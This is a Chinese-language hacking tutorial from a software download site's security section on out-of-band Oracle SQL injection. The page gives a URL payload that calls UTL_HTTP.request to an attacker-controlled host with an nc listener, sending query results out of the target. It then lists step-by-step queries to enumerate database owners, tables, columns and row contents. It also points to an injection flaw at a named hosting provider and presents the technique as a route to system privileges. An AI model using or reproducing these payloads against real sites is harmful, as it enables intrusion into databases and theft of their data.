您的位置: 飞扬精品软件园 >> 文章中心 >> 安全防线 >> 安全防护 >> Oracle注射技术:Oracle+nc注射

相关文章链接

本类文章排行

最新新闻资讯

    Oracle注射技术:Oracle+nc注射

    Oracle注射技术:Oracle+nc注射


    • 阅览次数: 文章来源: 原文作者: 整理日期: 2010-05-22

    Oracle注射技术:Oracle+nc注射
    作者:Kindle
    MSN :Kindle@live.cn
    Blog:http://hi.baidu.com/system_exp
    Team:反安全技术小组 (http://bbs.exploits.com.cn)

    首先外网nc监听对应的端口

    url语句简单如下所示:

    http://www.exploits.com.cn/Kindle?jsp=1 and UTL_HTTP.request('外网ip:port/'||(sql语句))=1--

    内容如下:

    and UTL_HTTP.request('外网ip:port/'||(sql语句))=1--
    爆库:

    select owner from all_tables where rownum=1

    select owner from all_tables where owner<>'第一个库名' and rownum=1

    select owner from all_tables where owner<>'第一个库名' and owner<>'第二个'and rownum=1

    select owner from all_tables where owner<>'第一个库名' and owner<>'第一个库名' and rownum=1


    以此论推

    爆表:

    select TABLE_NAME from all_tables where owner='库名'and rownum=1

    select TABLE_NAME from all_tables where owner='库名'and rownum=1 and TABLE_NAME<>'表名1'

    select TABLE_NAME from all_tables where owner='库名'and rownum=1 and TABLE_NAME<>'表名1' and TABLE_NAME<>'表名2'

    以此论推

    爆列:

    select COLUMN_NAME from user_tab_columns where table_name='表名' and rownum=1

    select COLUMN_NAME from user_tab_columns where table_name='表名' and rownum=1 and COLUMN_NAME<>'第一个爆出的列名'

    select COLUMN_NAME from user_tab_columns where table_name='表名' and rownum=1 and COLUMN_NAME<>'第一个爆出的列名' and COLUMN_NAME<>'第二个爆出的列名'

    爆内容:

    第一个内容:select 列名 from 表名 where rownum=1

    第二个内容:select 列名 from 表名 where rownum=1 and 列名<>'第一个值'

    第三个内容:select 列名 from 表名 where rownum=1 and 列名<>'第一个值' and 列名<>'第二个值'

    以此论推

    现在大家转过头来看下“万网的尴尬-万网ORACLE注入漏洞曝光”

    http://bbs.exploits.com.cn/read.php?tid-144.html

    是不是很明了了...o(∩_∩)o...哈哈

    注:
    1:在windows环境下,oracle是以服务的形式启动的,这样通过web注射就可以直接获得system权限(此部分内容正在整理测试阶段中,以供给大家更直观、简洁、有效的参考资料
    2:针对unix和linux操作系统方面对于Oracle也会作出分析,相信Oracle注射将会成为转入高级Hack入侵的桥梁
    3.这是个系列文章,后文有待更新


查看所有评论

网友对Oracle注射技术:Oracle+nc注射的评论

网名:
主题:
内容:
验证码: